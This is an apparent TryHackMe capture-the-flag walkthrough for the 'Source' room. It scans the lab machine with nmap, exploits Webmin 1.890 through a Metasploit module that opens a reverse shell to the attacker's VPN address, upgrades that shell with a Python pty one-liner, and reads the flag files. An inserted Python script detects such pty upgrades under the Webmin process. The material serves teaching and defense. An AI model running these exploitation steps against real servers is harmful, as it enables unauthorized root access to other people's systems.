Source Room: A TryHackMe 101 Walkthrough
Introduction:
Welcome to the Source room on the TryHackMe platform, designed for beginners with an easy difficulty level. This article will explore the steps to hack into the virtual machine using Nmap and Metasploit. So, buckle up, and let’s dive into the world of ethical hacking!
Tools Used:
The Source room utilizes two essential tools for penetration testing:
- Nmap: A powerful network scanning tool that helps identify open ports, services, and vulnerabilities on a target machine.
- Metasploit: An exploitation framework that simplifies exploiting vulnerabilities in a target system.
Step 1: Connect to THM VPN
Before starting, ensure your TryHackMe VPN is connected and working. If you need assistance with a VPN connection, refer to this article.
Step 2: Launch the Machine
Start the machine provided in the room and let it run for 3–4 minutes before proceeding. A box will appear indicating that the machine is working, and it will show the IP address of the newly deployed machine.
Step 3: Ping the Machine
Ensure the machine is responsive by pinging it using the terminal of your Kali Linux machine.
Use the command: ping <Machine_IP>
Example:
ping 10.10.36.29
If successful, proceed to the next step.
Step 4: Port Scanning with Nmap
Perform a thorough port scan using Nmap with the command: nmap -vv -T4 -p- <Machine_IP>
Example:
nmap -vv -T4 -p- 10.10.26.39
Be patient, this may take some time. Each flag serves a specific purpose:
- -vv: Increase verbosity.
- -T4: Set the scan speed to aggressive.
- -p-: Scan all ports.
Step 5: Analyzing Open Ports
We can now see the open ports and services. Focus on port 10000, as it seems exploitable. Port 22 is also open with SSH, but without credentials, our focus shifts to port 10000.
Step 6: Accessing Webmin
Access the web interface on port 10000 in your browser using the URL format https://<Machine_IP>:10000
Example:
https://10.10.26.39:10000
Bypass the browser's security warning and reach the Webmin login page by following the steps given below:
- Click on the “Advanced” button.
- Then click the “Accept the Risk and Continue” button.
Bonus:
If we access the same address over HTTP instead of HTTPS, using the URL format http://<Machine_IP>:10000, we still get a web page, but a different one.
This page provides us with a link, but when we click on the link it takes us to yet another page.
We cannot access the Webmin page this way, as we did when we were opening the link with HTTPS. That is because this link tries to connect us with an internal computer, and because our subnet is different from the internal computer's, we are unable to connect.
Step 7: Identify Webmin Version
Run another Nmap scan with the command: nmap -sV -p 10000 <Machine_IP>
Example:
nmap -sV -p 10000 10.10.26.39
The scan will return the version of the service running on port 10000: Webmin version 1.890.
Step 8: Preparing for Exploitation
With the knowledge of Webmin and its version, launch Metasploit with:
msfconsole -q
Search for Webmin exploits using:
search webmin
Choose the appropriate exploit, which is exploit 7. You can select it with:
use 7
Step 9: Exploiting with Metasploit
You can see the options of the exploit by using the command:
show options
Set the necessary options with set commands, including RHOST (machine IP), SSL (true), and LHOST (THM VPN IP).
Example:
set RHOST 10.10.26.39
set SSL true
set LHOST 10.17.98.201
Make sure that the options section shows these values after all the above steps are complete.
Execute the exploit with the run command to gain shell access.
Step 10: Making the Shell Interactive
We get shell access once the exploit has done its work, but the shell is not very responsive. To make it more interactive, we use the following commands:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo;
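Seen from the defender's side, the shell upgrade above leaves a recognisable process chain: a Python one-liner calling pty.spawn whose ancestor is the Webmin server. The following is an added example, not part of the original walkthrough, that walks a process snapshot to flag that chain. The snapshot rows are constructed, and the "pid ppid user command" layout, the function names and the use of miniserv.pl (Webmin's server script) as the service marker are assumptions.

```python
import re

# Constructed process snapshot ("pid ppid user command"), not real telemetry.
SAMPLE_SNAPSHOT = """\
1 0 root /sbin/init
612 1 root /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
2291 612 root /bin/sh
2305 2291 root python3 -c import pty;pty.spawn("/bin/bash")
840 1 dark -bash
2400 840 dark python3 -c import pty;pty.spawn("/bin/bash")
"""

# Matches the interpreter one-liner used to allocate a pseudo-terminal.
PTY_UPGRADE = re.compile(r"\bpython[0-9.]*\s+-c\s+.*\bpty\.spawn\(")
# Assumption: services that should never be the ancestor of an interactive shell.
SERVICE_MARKERS = ("miniserv.pl",)

def parse_snapshot(text):
    """Return {pid: (ppid, user, command)}; malformed rows are skipped."""
    procs = {}
    for line in text.splitlines():
        parts = line.split(None, 3)
        if len(parts) == 4 and parts[0].isdigit() and parts[1].isdigit():
            procs[int(parts[0])] = (int(parts[1]), parts[2], parts[3])
    return procs

def service_ancestor(procs, pid):
    """Walk parent links; return the first ancestor pid that is a marked service."""
    seen = set()  # guards against pid reuse creating a loop in the snapshot
    ppid = procs[pid][0]
    while ppid in procs and ppid not in seen:
        seen.add(ppid)
        if any(marker in procs[ppid][2] for marker in SERVICE_MARKERS):
            return ppid
        ppid = procs[ppid][0]
    return None

def find_pty_upgrades(text):
    """Return (pid, service_pid) for each pty.spawn one-liner under a service."""
    procs = parse_snapshot(text)
    hits = [(pid, service_ancestor(procs, pid))
            for pid, (_, _, cmd) in sorted(procs.items()) if PTY_UPGRADE.search(cmd)]
    return [(pid, svc) for pid, svc in hits if svc is not None]

if __name__ == "__main__":
    for pid, svc in find_pty_upgrades(SAMPLE_SNAPSHOT):
        print(f"ALERT: pid {pid} allocated a PTY under service pid {svc}")
```

The same one-liner run from a normal login shell (pid 2400 in the sample) is not flagged, because no marked service appears in its ancestry.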
Step 11: Locate the User and Root Flags
Navigate to the root directory by using the cd .. command, find the home directory, and discover the ‘dark’ directory. Retrieve the ‘user.txt’ file, then navigate to the root directory to locate and read the ‘root.txt’ file. We can see the contents of the file by using the cat root.txt command.
Conclusion:
Congratulations! You’ve completed the Source Room on TryHackMe using Nmap and Metasploit. This walkthrough provides a foundational understanding of basic penetration testing techniques. Keep practicing and exploring to enhance your ethical hacking skills. Happy hacking!